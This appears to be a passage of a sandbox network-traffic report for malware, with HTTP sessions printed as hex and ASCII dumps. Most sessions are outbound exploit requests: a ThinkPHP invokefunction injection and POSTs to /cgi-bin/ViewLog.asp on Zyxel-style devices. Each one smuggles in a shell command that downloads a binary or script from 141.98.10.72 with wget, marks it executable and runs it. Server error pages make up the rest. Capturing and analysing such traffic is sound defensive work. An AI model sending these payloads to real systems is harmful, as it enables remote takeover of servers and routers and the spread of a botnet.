                                                      Data Ascii: padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left;
                                                      Feb 14, 2024 09:29:42.968538046 CET1286INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20
                                                      Data Ascii: -image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute;
                                                      Feb 14, 2024 09:29:42.968606949 CET1286INData Raw: 77 71 4e 69 62 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73
                                                      Data Ascii: wqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md
                                                      Feb 14, 2024 09:29:42.968642950 CET1286INData Raw: 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37
                                                      Data Ascii: Nlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA
                                                      Feb 14, 2024 09:29:42.968678951 CET1145INData Raw: 48 73 6a 30 79 46 2b 49 77 48 55 75 73 37 73 6d 56 68 38 49 48 56 47 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66
                                                      Data Ascii: Hsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGc
                                                      Feb 14, 2024 09:29:42.969188929 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to hdr.v-tek.fi's <a href="mailto:jvieno@gmail.com?su
                                                      Feb 14, 2024 09:29:42.969224930 CET338INData Raw: 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: ogolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 cPanel, Inc.</


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      353192.168.2.153442295.217.25.15080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:42.750446081 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:42.982604980 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.18.0
                                                      Date: Wed, 14 Feb 2024 08:29:42 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      354192.168.2.153542095.66.132.1380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:42.765275955 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:43.009756088 CET490INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:43 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      355192.168.2.155174295.58.194.5880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:42.806195974 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:44.281685114 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:46.009643078 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:49.593530893 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.505330086 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:10.328927994 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:39.256113052 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      356192.168.2.154734894.125.143.538080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:43.966398954 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      357192.168.2.154338094.123.131.158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.023224115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      358192.168.2.155426094.123.151.2148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.023293972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      359192.168.2.154218094.120.149.1518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.023361921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      360192.168.2.155048831.200.53.2478080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.023413897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      361192.168.2.154641694.123.131.1548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.023489952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      362192.168.2.153370895.86.98.628080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.023530960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      363192.168.2.156095062.33.133.1008080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.092219114 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:45.753789902 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.082366943 CET351INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.0.15
                                                      Date: Wed, 14 Feb 2024 08:29:46 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 169
                                                      Connection: keep-alive
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      364192.168.2.154305862.204.94.1708080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.162647963 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:44.359657049 CET697INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:44 GMT
                                                      Server: Apache/2.4.56 (Debian)
                                                      Referrer-Policy: no-referrer
                                                      X-Content-Type-Options: nosniff
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Permitted-Cross-Domain-Policies: none
                                                      X-Robots-Tag: noindex, nofollow
                                                      X-XSS-Protection: 1; mode=block
                                                      Content-Length: 304
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      365192.168.2.155527031.20.82.178080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.178006887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:44.386367083 CET701INHTTP/1.0 404 Not Found !!!
                                                      Pragma: no-cache
                                                      Content-type: text/html
                                                      WWW-Authenticate: /cgi-bin/ViewLog.asp
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 63 65 6e 74 65 72 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 31 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 30 30 41 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 66 61 63 65 3d 22 41 72 69 61 6c 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 33 46 33 46 33 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 3d 22 23 30 30 30 30 38 30 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 64 61 72 6b 3d 22 23 30 30 30 30 38 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 69 6e 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 